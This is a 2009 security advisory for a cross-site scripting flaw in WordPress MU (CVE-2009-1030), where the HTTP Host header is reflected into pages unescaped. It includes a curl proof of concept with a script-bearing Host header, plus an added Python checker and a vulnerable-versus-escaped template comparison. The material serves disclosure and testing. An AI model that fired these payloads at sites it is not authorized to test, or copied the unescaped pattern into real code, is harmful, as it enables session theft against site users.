WordPress MU 'wp-includes/wpmu-functions.php' Cross-Site Scripting Vulnerability
Written by Juan Galiana Lara   
Thursday, 26 March 2009 22:47

-\\Bugtraq ID:
34075

-\\Class:
Input Validation Error

-\\CVE:
CVE-2009-1030


-\\Remote:
Yes

-\\Local:
No

-\\Published:
Mar 10 2009 12:00AM

-\\Updated:
Mar 26 2009 04:26PM

-\\Credit:
Juan Galiana Lara



-\\Vulnerable:
WordPress WordPress MU 1.3.1
WordPress WordPress MU 1.3
WordPress WordPress MU 1.2.3
WordPress WordPress MU 1.2.2
WordPress WordPress MU 2.6



-\\Not Vulnerable:
WordPress WordPress MU 2.7



-\\Discussion
WordPress MU is prone to a cross-site scripting vulnerability because the application
fails to properly sanitize user-supplied input. The affected code in
'wp-includes/wpmu-functions.php' reflects the value of the HTTP Host request header into
the HTML it generates without escaping it, so a request whose Host header carries markup
has that markup rendered as part of the page (the proof of concept below uses
'wp-admin/profile.php' as the reflecting page).

An attacker may leverage this issue to execute arbitrary script code in the browser of
an unsuspecting user in the context of the affected site. This may help the attacker steal
cookie-based authentication credentials and launch other attacks.

Versions prior to WordPress MU 2.7 are vulnerable.



-\\Exploit(s)/PoC(s):
An attacker can exploit this issue by enticing an unsuspecting user to follow a
malicious URI. Note, however, that the injection point is the Host request header rather
than a URL parameter: a link by itself does not let the attacker choose the Host header
a victim's browser sends, so practical exploitation requires a position from which that
header can be controlled. The proof of concept therefore sends the header directly with
curl, using the tester's own session cookies (profile.php requires an authenticated
user), saves the response and opens it locally. The alert fires from the local file, so
this demonstrates that the header value is rendered unescaped rather than script
execution in the site's own origin.

The following proof of concept is available:

$ curl -H "Cookie: my cookies here" \
       -H "Host: <body onload=alert(String.fromCharCode(88,83,83))>" \
       http://www.example.com/wp-admin/profile.php > tmp.html
$ firefox tmp.html
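The following is an added example, not code from the advisory or from WordPress MU. It puts a constructed stand-in for the vulnerable pattern (a template that drops the raw Host header into HTML) next to its escaped form, and turns the curl check above into a side-effect-free test: a random marker tag goes into the Host header in place of the alert(), and the response is classified by whether the marker comes back as live markup, HTML-encoded, or not at all. The template strings, the 'hdrxss' marker prefix and the check_target() helper are assumptions made for the example; check_target() does a real HTTP request and should only be pointed at systems you are permitted to test.

```python
"""Added example (not code from the advisory or from WordPress MU).

A stand-in for the vulnerable rendering described in the advisory next to
its escaped form, plus an inert version of the advisory's curl check that
reports whether a page reflects the HTTP Host header unescaped.
"""
import html
import http.client
import secrets


def make_marker() -> str:
    """Random token so a reflection cannot be confused with page content.
    The 'hdrxss' prefix is an arbitrary choice for this example."""
    return "hdrxss" + secrets.token_hex(4)


def host_payload(marker: str) -> str:
    """Same shape as the advisory PoC (a tag inside the Host header) with the
    alert() replaced by an inert marker tag."""
    return f"<{marker}>"


def classify_reflection(body: str, marker: str) -> str:
    """'unescaped' if the marker tag came back as live markup,
    'escaped' if the marker is present but its brackets were encoded somehow,
    'absent' if the Host value did not reach the page at all."""
    if f"<{marker}>" in body:
        return "unescaped"
    if marker in body:
        return "escaped"
    return "absent"


# --- constructed stand-ins for the vulnerable and the fixed rendering -------

def render_vulnerable(host_header: str) -> str:
    """Hypothetical template that builds a link from the raw Host header,
    the pattern this advisory describes (constructed, not WordPress MU code)."""
    return (f'<a href="http://{host_header}/wp-admin/profile.php">'
            f"Your profile</a>")


def render_fixed(host_header: str) -> str:
    """Same template with the header HTML-escaped before it reaches the page."""
    safe = html.escape(host_header, quote=True)
    return f'<a href="http://{safe}/wp-admin/profile.php">Your profile</a>'


# --- live check: the curl line from the PoC, done from Python ---------------

def check_target(server: str, path: str = "/wp-admin/profile.php",
                 cookie: str = "", port: int = 80, timeout: float = 10.0) -> str:
    """Send one GET with the marker in the Host header and classify the reply.
    profile.php needs an authenticated session, hence the Cookie header.
    Assumes plain HTTP on `server` (assumption for this example)."""
    marker = make_marker()
    headers = {"Host": host_payload(marker)}   # http.client keeps our Host
    if cookie:
        headers["Cookie"] = cookie
    conn = http.client.HTTPConnection(server, port, timeout=timeout)
    try:
        conn.request("GET", path, headers=headers)
        body = conn.getresponse().read().decode("utf-8", "replace")
    finally:
        conn.close()
    return classify_reflection(body, marker)


if __name__ == "__main__":
    m = make_marker()
    p = host_payload(m)
    print("vulnerable template:", classify_reflection(render_vulnerable(p), m))
    print("fixed template:     ", classify_reflection(render_fixed(p), m))
```

Against a live host the call is check_target("www.example.com", cookie="my cookies here"); a result of "unescaped" means the installation still renders the Host header verbatim, "escaped" means the value is reflected but neutralised, and "absent" means that page does not reflect it at all (which does not rule out other pages).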



-\\Solution
The vendor has released WordPress MU 2.7 to address this issue.  Please see the references
for more information.


WordPress WordPress MU 1.2.2, 1.2.3, 1.3, 1.3.1 and 2.6
--WordPress latest.zip
http://mu.wordpress.org/latest.zip



-\\Reference(s)
--WordPress Homepage
http://wordpress.org  (WordPress)
--[ISecAuditors Security Advisories] WordPress MU HTTP Header XSS Vulnerability
http://www.securityfocus.com/archive/1/50166  (ISecAuditors Security Advisories)